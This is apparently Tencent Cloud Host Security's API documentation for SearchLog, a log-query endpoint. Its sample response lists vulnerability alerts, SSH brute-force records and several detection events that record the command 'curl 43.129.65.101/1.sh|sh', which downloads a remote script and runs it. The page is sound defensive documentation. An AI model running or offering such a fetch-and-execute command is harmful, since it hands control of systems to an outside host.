tencent cloud

主机安全

动态与公告
产品动态
产品公告
新手指引
产品简介
产品概述
产品优势
基本概念
应用场景
关联产品
功能介绍与版本比较
购买指南
购买安全防护授权
购买日志分析服务
快速入门
操作指南
安全概览
资产概览
主机列表
资产指纹
漏洞管理
基线管理
文件查杀
异常登录
密码破解
恶意请求
高危命令
本地提权
反弹 Shell
Java 内存马
核心文件监控
网络攻击
勒索防御
日志分析
授权管理
告警设置
访问管理指引
混合云安装指引
新手常见问题
软件相关说明
功能行为描述
客户端进程说明
安全基线检测列表
JSON 格式告警数据解析
日志字段数据解析
客户端安装指引
安全评分说明
实践教程
漏洞自动修复
恶意文件处理
故障处理
Linux 入侵类问题排查思路
Windows 入侵类问题排查思路
Linux 客户端离线排查
Windows 客户端离线排查
异常登录的消息提醒
API 文档
History
Introduction
API Category
Asset Management APIs
Virus Scanning APIs
Abnormal Log-in APIs
Password Cracking APIs
Malicious Request APIs
High-Risk Command APIs
Local Privilege Escalation APIs
Reverse Shell APIs
Vulnerability Management APIs
New Baseline Management APIs
Baseline Management APIs
Advanced Defense APIs
Security Operation APIs
Expert Service APIs
Other APIs
Overview Statistics APIs
Settings Center APIs
Making API Requests
Intrusion Detection APIs
Data Types
Error Codes
常见问题
相关协议
Terms of Service
Service Level Agreement
数据处理和安全协议
联系我们
词汇表
文档主机安全API 文档Other APIsSearchLog

SearchLog

PDF
聚焦模式
字号
最后更新时间: 2024-12-06 15:40:03

1. API Description

Domain name for API request: cwp.intl.tencentcloudapi.com.

This API is used to query logs.

A maximum of 20 requests can be initiated per second for this API.

We recommend you to use API Explorer
Try it
API Explorer provides a range of capabilities, including online call, signature authentication, SDK code generation, and API quick search. It enables you to view the request, response, and auto-generated examples.

2. Input Parameters

The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.

Parameter Name Required Type Description
Action Yes String Common Params. The value used for this API: SearchLog.
Version Yes String Common Params. The value used for this API: 2018-02-28.
Region No String Common Params. This parameter is not required.
StartTime Yes Integer Start time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds
EndTime Yes Integer End time for logs to be searched and analyzed, which is a Unix timestamp in milliseconds
QueryString Yes String Statement for search and analysis, with a maximum length of 12 KB
Count No Integer Number of raw logs returned for a single query. Maximum value: 1000. The Context parameter can be used to obtain subsequent logs.
Sort No String Order for returning the raw logs. Valid values: asc (ascending), desc (descending). Default value: desc.
Context No String Pass the Context value returned by the last API call to retrieve more subsequent logs. A total of up to 10,000 raw logs can be obtained, with a validity period of 1 hour.

3. Output Parameters

Parameter Name Type Description
Count Integer Number of raw logs matching the retrieval criteria
Context String Pass through the Context value returned by this API, which can access more logs later, with an expiration time of 1 hour.
ListOver Boolean Whether all logs meeting the retrieval criteria have been returned. If not, use the Context parameter to retrieve more logs.
Analysis Boolean Whether the returned data is the SQL analysis result
Data Array of LogInfo Raw logs matching the retrieval criteria
RequestId String The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem.

4. Example

Example1 Example

Input Example

POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>

{
    "Sort": "desc",
    "Count": "20",
    "QueryString": "",
    "StartTime": "1656641065449",
    "EndTime": "1656641965449"
}

Output Example

{
    "Response": {
        "Analysis": false,
        "Context": "",
        "Count": 17,
        "Data": [
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability on form structure page.\",\"id\":\"771\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.6-90 and above or 2.4.39 and above\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest race condition vulnerability\",\"id\":\"767\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_auth_digest module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php  SQL injection vulnerability\",\"id\":\"772\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. Upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension remote code execution vulnerability\",\"id\":\"764\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"Upgrade Apache HTTP Server to version 2.4.46\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module denial-of-service vulnerability\",\"id\":\"769\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_http2 module enabled, and the Apache HTTP Server version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1. \",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version and avoid using weak passwords.\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin authorized user remote command execution vulnerability\",\"id\":\"768\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x SQL injection vulnerability of export feature\",\"id\":\"765\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"High-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1. It is recommended to upgrade to the latest official version, and the official website address is: https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS vulnerability\",\"id\":\"770\",\"vul_category\":\"Web-CMS vulnerability\",\"descript\":\"Vulnerability file path: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"Medium-risk\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"Upgrade to version 2.4.44 and later.\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi buffer overflow vulnerability\",\"id\":\"766\",\"vul_category\":\"Application vulnerability\",\"descript\":\"Apache HTTP Server has the mod_proxy_uwsgi module enabled, and the version is: 2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1.\",\"event_status\":\"modify\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641946000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641844000
            },
            {
                "Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Beijing-Beijing city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641824000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641520000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641484000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"\"Brute force cracking failed\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"Shanghai-Shanghai city\",\"banned\":\"Unblocked (non-Pro Edition; non-Ultimate Edition)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"Pending\",\"username\":\"root\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641464000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641280000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            },
            {
                "Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.Malicious commands - download & execute unknown programs\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"High-risk\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"Pending\"}",
                "FileName": "",
                "Source": "30.46.128.22",
                "TimeStamp": 1656641160000
            }
        ],
        "ListOver": true,
        "RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
    }
}

5. Developer Resources

SDK

TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.

Command Line Interface

6. Error Code

There is no error code related to the API business logic. For other error codes, please see Common Error Codes.

上一篇: ModifyWarningHostConfig下一篇: StopAssetScan

帮助和支持

本页内容是否解决了您的问题?

填写满意度调查问卷,共创更好文档体验。

文档反馈